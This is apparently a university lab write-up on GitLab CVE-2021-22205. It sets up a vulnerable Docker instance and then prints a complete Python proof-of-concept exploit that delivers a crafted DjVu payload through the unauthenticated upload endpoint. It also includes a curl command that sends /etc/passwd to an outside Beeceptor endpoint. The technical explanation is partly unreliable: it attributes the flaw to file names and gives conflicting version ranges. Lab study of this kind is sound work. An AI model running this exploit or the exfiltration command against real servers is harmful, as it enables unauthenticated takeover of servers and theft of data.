Vulnerable-GitLab-CVE-2021-22205

Author: Khasan Abdurakhmanov Author's Avatar

Affiliation: Innopolis University Author's Avatar

TABLE OF CONTENTS

Introduction

CVE-2021-22205 is a critical security vulnerability that was discovered in the GitLab Community Edition and GitLab Enterprise Edition software. The vulnerability allows an unauthenticated attacker to execute arbitrary code on the GitLab server. The vulnerability was discovered in the GitLab file upload functionality. Specifically, it was found that GitLab did not properly sanitize and validate user-supplied file names, allowing an attacker to craft a malicious file name that could lead to remote code execution.

Tools and Setup

In order to gain a comprehensive understanding of the vulnerability you are dealing with and to exploit it effectively, it is imperative to have a collection of specific tools at your disposal. Here is a list of the essential tools you will need:

  1. Docker

    Docker is a platform that has gained wide acceptance for containerization. It greatly simplifies the process of managing and deploying applications in containers, making it a vital tool for any developer.

  1. Beeceptor

    Beeceptor is a free online tool that provides a set of features to help developers test and debug their APIs. It allows you to create mock API endpoints that mimic the behavior of real APIs. You can define the expected request parameters, headers, and body, and specify the response that should be returned.

In addition to Docker, this guide will also use Docker Compose to define and manage the multi-container application. Docker Compose allows you to define the services, networks, and volumes required for the application in a single configuration file, making it easier to set up and manage the environment.


Setting Up Vulnerable-GitLab-CVE-2021-22205

There are only one way provided to set up Vulnerable-GitLab-CVE-2021-22205 using Docker Compose.

  1. Clone the Vulnerable-GitLab Repository
    First, clone the Vulnerable-GitLab repository from GitHub to your local machine:
git clone https://github.com/SNE-M23-SN/Vulnerable-GitLab.git cd Vulnerable-GitLab/CVE-2021-22205/

  1. Build and Run the GitLab Container
    Use Docker Compose to build and run the GitLab container:
docker compose up -d

  1. The Infrastructure Overview

This infrastructure setup provides a complete GitLab environment, including a Redis cache, a PostgreSQL database, and the GitLab application itself.

  1. Access GitLab
    Open http://localhost:8080 in your web browser to access the GitLab interface. The credentials of default administrator account are root and vulhub123456


Exploiting Vulnerabilities

CVE-2021-22205 is a critical security vulnerability affecting GitLab, a widely used platform for DevOps lifecycle management. This vulnerability allows an unauthenticated attacker to execute arbitrary code on a GitLab server, posing significant risks to the confidentiality, integrity, and availability of data hosted on the platform.

Key Details

Technical Details

The vulnerability is caused by improper sanitization and validation of user-supplied file names in the GitLab file upload functionality. An attacker could craft a malicious file name that, when processed by GitLab, would lead to remote code execution on the server.

The root cause of the vulnerability lies in the way GitLab handles file uploads and the lack of proper input validation and sanitization. This allowed an attacker to bypass the security measures and execute arbitrary code on the server.

Exploit Scenario

  1. Prerequisites:

    • Target Identification: Identify a GitLab instance running a vulnerable version (prior to 13.10.3, 13.9.6, or 13.8.8).
    • Access: Typically, attackers do not require prior authentication to exploit this vulnerability, making it particularly dangerous if the GitLab server is exposed publicly.
  2. Proof Of Concept

This script is a Proof of Concept (PoC) for the CVE-2021-22205 vulnerability in GitLab. Let’s break down the key components of the script:

import sys import re import requests target = sys.argv[1] command = sys.argv[2] session = requests.session() CSRF_PATTERN = re.compile(rb'csrf-token" content="(.*?)" />') def get_payload(command): rce_payload = b'\x41\x54\x26\x54\x46\x4f\x52\x4d' rce_payload += (len(command) + 0x55).to_bytes(length=4, byteorder='big', signed=True) rce_payload += b'\x44\x4a\x56\x55\x49\x4e\x46\x4f\x00\x00\x00\x0a\x00\x00\x00\x00\x18\x00\x2c\x01\x16\x01\x42\x47\x6a\x70\x00\x00\x00\x00\x41\x4e\x54\x61' rce_payload += (len(command) + 0x2f).to_bytes(length=4, byteorder='big', signed=True) rce_payload += b'\x28\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x09\x28\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5c\x0a\x22\x20\x2e\x20\x71\x78\x7b' rce_payload += command.encode() rce_payload += b'\x7d\x20\x2e\x20\x5c\x0a\x22\x20\x62\x20\x22\x29\x20\x29\x0a' return rce_payload def csrf_token(): response = session.get(f'{target}/users/sign_in', headers={'Origin': target}) g = CSRF_PATTERN.search(response.content) assert g, 'No CSRF Token found' return g.group(1).decode() def exploit(): files = [('file', ('test.jpg', get_payload(command), 'image/jpeg'))] session.post(f'{target}/uploads/user', files=files, headers={'X-CSRF-Token': csrf_token()}) if __name__ == '__main__': exploit() print('finish test')

This PoC script demonstrates how an attacker can exploit the CVE-2021-22205 vulnerability in GitLab to execute arbitrary commands on the server. By crafting a malicious file name and including the payload in the file content, the script can bypass the GitLab security measures and gain remote code execution on the target system.

To use this PoC, you would need to provide the URL of the vulnerable GitLab instance and the command you want to execute on the server as command-line arguments. For example:

python poc.py http://gitlab.example.com "touch /tmp/success"

This would execute the touch /tmp/success command on the target GitLab server if the vulnerability is present and the exploitation is successful.

To further enhance our understanding and usage of this script, we can take advantage of the following command:

curl -X POST -F "file=@/etc/passwd" https://inno-sne.free.beeceptor.com

This specific command will enable us to send a POST request to the specified URL. As a result of executing this command, what happens is that we upload the contents of the /etc/passwd file directly to the previously created Beeceptor endpoint. This is highly beneficial as it allows us to view and interact with the contents of the –/etc/passwd== file through our Beeceptor Endpoint, which we had the foresight to set up in advance. It’s a smart and efficient way to fully utilize this script to our advantage.

Impact

The impact of CVE-2021-22205 is severe, as it allows an unauthenticated attacker to gain complete control over the GitLab server. This could lead to data breaches, system compromise, and further attacks on the organization’s infrastructure. The vulnerability affects GitLab Community Edition versions 13.9.0 through 14.1.7, and GitLab Enterprise Edition versions 13.9.0 through 14.1.7. It is considered a critical vulnerability with a CVSS score of 10.0, the highest possible severity rating.

Conclusion

CVE-2021-22205 exposes a critical vulnerability in GitLab’s file upload functionality, allowing attackers to execute arbitrary commands on a vulnerable server. This exploit underscores the importance of robust security practices and prompt patch management in protecting GitLab deployments.